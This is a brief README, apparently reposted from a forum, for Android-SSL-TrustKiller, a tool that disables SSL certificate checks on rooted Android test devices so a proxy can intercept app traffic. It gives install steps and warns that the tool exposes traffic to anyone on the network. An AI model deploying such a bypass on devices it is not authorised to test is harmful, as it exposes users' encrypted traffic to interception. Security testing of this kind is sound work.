1. Ensure that Cydia Substrate has been deployed on your test device. The installer requires a rooted device and can be found on the Google Play store at https://play.google.com/store/apps/details?id=com.saurik.substrate&hl=en
2. Download the pre-compiled APK available at https://github.com/iSECPartners/Android-SSL-TrustKiller/releases
3. Install the APK package on the device: adb install Android-SSL-TrustKiller.apk
4. Add the CA certificate of your proxy tool to the device's trust store.

Notes
Use only on test devices, as anyone on the same network can intercept traffic from a number of applications, including Google apps. This extension will soon be integrated into Introspy-Android (https://github.com/iSECPartners/Introspy-Android) in order to allow you to proxy only selected applications.

License
See ./LICENSE.

Authors
Marc Blanchou

Sursa: https://github.com/iSECPartners/Android-SSL-TrustKiller